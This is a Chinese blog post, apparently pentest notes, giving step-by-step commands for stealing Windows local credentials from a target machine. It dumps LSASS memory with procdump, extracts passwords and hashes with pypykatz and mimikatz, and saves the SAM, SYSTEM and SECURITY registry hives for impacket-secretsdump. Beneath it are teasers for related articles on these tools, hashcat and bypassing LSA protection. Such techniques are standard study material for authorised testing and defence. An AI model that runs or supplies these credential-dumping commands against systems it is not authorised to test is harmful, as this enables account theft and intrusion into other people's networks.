读取目标windows本地LM hash

最新推荐文章于 2024-08-10 08:32:05 发布
最新推荐文章于 2024-08-10 08:32:05 发布
阅读量670 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/capiton_/article/details/104688208
版权

1.pypykatz读取

项目地址:
https://github.com/skelsec/pypykatz

安装

git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
python3 setup.py install

执行:

上传procdump.exe,导出lsass.dmp文件

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

导出lsass.dmp至本地,执行pypykatz

pypykatz lsa minidump lsass.dmp

2.secretsdump读取

reg save hklm\sam sam.hive
reg save hklm\system system.hive 
reg save hklm\security security.hive

kali中执行:

impacket-secretsdump -sam sam.hive -security security.hive -system system.hive LOCAL

在这里插入图片描述

3.mimikaz读取

上传procdump.exe

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

下载lsass.dmp(选择相同操作系统)

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >pass.txt
capiton_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
纯Python中的Mimikatz实现-Python开发
05-25
pypykatz在纯Python中的Mimikatz实现。 至少有一部分:)在所有支持python> = 3.6 WIKI的操作系统上运行。从版本0.1.1开始,命令行有所更改。 不用担心,我在纯Python中有一个很棒的WIKI fo pypykatz Mimikatz实现。 至少有一部分:)在所有支持python> = 3.6 WIKI的操作系统上运行。从版本0.1.1开始,命令行有所更改。 不用担心,我有一个很棒的维基百科。 安装通过pip或从github克隆来安装它。 安装程序将在python的Script目录中创建pypykatz可执行文件。 您可以从那里运行它,应该在您的PATH中。 保重,因为我要打公关,所以github主版本可能会失败
探索Pypykatz:深度揭秘Windows系统的密码解析神器
gitblog_00040的博客
03-23 1021
探索Pypykatz:深度揭秘Windows系统的密码解析神器 pypykatzMimikatz implementation in pure Python项目地址:https://gitcode.com/gh_mirrors/py/pypykatz 项目简介 是一个开源项目,由安全研究人员Skelsec团队开发。它是一个Python实现的 Mimikatz 工具,Mimikatz是著名的Win...
探秘凭证获取新工具:Pypykatz Server——守护企业安全的智能之选
gitblog_00029的博客
06-21 900
探秘凭证获取新工具:Pypykatz Server——守护企业安全的智能之选 pypykatz_serverPypykatz server项目地址:https://gitcode.com/gh_mirrors/py/pypykatz_server 在数字世界的深处,安全始终是每个组织不可忽视的重要议题。今天,我们带来了一个革新性的开源工具——Pypykatz Server,它以服务器-代理模型为...
kail中的渗透测试工具
任浩的博客
01-23 861
1.AssassinGo 基于Go的高并发可拓展式Web渗透框架 AssassinGo是一个可扩展和并发的信息收集和漏洞扫描框架,该框架基于Vue的WebGUI,前后端交互主要采用WebSocket技术,会将结果实时显示在前台。集成了高可用信息收集、基础攻击向量探测、Google-Hacking综合搜索和PoC自定义添加并对目标进行批量检测等功能的自动化Web渗透框架。 2.burpa: burp 自动化扫描工具 burpa使用burpsuite 自动化扫描网站,并将扫描结果输出成报告。 3.websock
windos工具和一些域渗透工具
2201_75378806的博客
03-27 2069
RTF是一种文本文件格式,旨在存储文本文档的格式化信息,例如字体、颜色和样式,而无需包含实际的二进制图像或多媒体数据。
WindowsLM-Hash与NTLM-Hash
02-11
文档描述了WindowsLM HASH ,NTLM HASH生成原理和规则。 并利用Python脚本进行模拟。 详细描述了 挑战/响应模式(鉴权协议)的原理 详细描述了NTLM SMB通信流程 对内网渗透入门感兴趣的一定下载
LM HASH 计算工具
06-15
这个是为了学windows安全的写(中文解释的地方bit写错了,懒得改了,学相关的一眼就看的懂,所以不影响),lm哈希计算器。每一步都有,NT以后可能会写,LM的计算中的DES计算没写好,需要手工计算利用里面的工具,都...
Windows MD5/SHA1 Hash 命令行工具
06-27
Windows 10及更高版本中,系统自带的PowerShell已经集成了Get-FileHash命令,支持包括SHA256在内的多种哈希算法,这使得在Windows环境中验证文件完整性变得更加方便。 总的来说,虽然MD5和SHA1在安全性上已略显...
hashcat for windows
12-01
Examples of hashcat-supported hashing algorithms are Microsoft LM hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, and Cisco PIX. Hashcat has made its way into the news many times for the ...
Hashcat for windows (GPU)
04-18
Hashcat for windows (GPU)
pypykatz:纯Python中的Mimikatz实现
04-12
pypykatz 纯Python中的Mimikatz实现。 至少一部分:) 在所有支持python> = 3.6的操作系统上运行 赞助商 维基 从版本0.1.1开始,命令行有所更改。 不用担心,我有一个很棒的。 正在安装 通过pip或从github克隆它来安装它。 安装程序将在python的Script目录中创建pypykatz可执行文件。 您可以从那里运行它,应该在您的PATH中。 小心,因为我要为新版本做适当的分支,所以github主版本可能会失败。 我将尝试创建一个稳定版本tho的分支。 通过PIP pip3 install pypykatz 通过Github 安装先决条件 pip3 install minidump minikerberos aiowinreg msldap winacl 克隆此仓库 git clone https://github.com/skelsec/p
Python-pypykatz是Mimikatz的纯Python实现
08-10
pypykatz:是Mimikatz的纯Python实现
Python-simplesam简单的纯SAM解析器以及记录对象
08-10
simplesam-简单的纯 SAM 解析器,以及记录对象
Python-用于解析包含Mimikatz输出的txt文件的Python脚本
08-10
用于解析包含Mimikatz输出的txt文件的Python脚本
Pypykatz 使用教程
最新发布
gitblog_01027的博客
08-10 416
Pypykatz 使用教程 pypykatzMimikatz implementation in pure Python项目地址:https://gitcode.com/gh_mirrors/py/pypykatz 项目介绍 Pypykatz 是一个用 Python 实现的 Mimikatz 工具,主要用于从 Windows 系统中提取密码、哈希和其他认证信息。它采用模块化设计,可以处理不同类型...
域渗透——绕过LSA保护机制总结
灰太的表格的博客
08-06 955
LSA绕过
RunAsPPL的对抗
Gamma_lab的博客
01-15 1089
启用LSA进程的保护 LSA 保护又名 RunAsPPL 这里直接引用官网的官方文档:https://docs.microsoft.com/en-us/windowsserver/security/credentials-protection-and-management/configuringadditional-lsa-protection#to-disable-lsa-protection 开启RunAsPPL 一般有两种方法 1.在单台计算机上启用 LSA 保护 打开注册表编辑器 (RegEdi
Windows LM-Hash与NTLM-Hash详解及Python模拟
"WindowsLM-Hash与NTLM-Hash的生成原理及Python模拟" Windows操作系统中,身份验证过程涉及到两种主要的哈希算法:LM (Lan Manager) Hash 和 NTLM (NT LAN Manager) Hash。这两种算法在早期版本的Windows系统中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值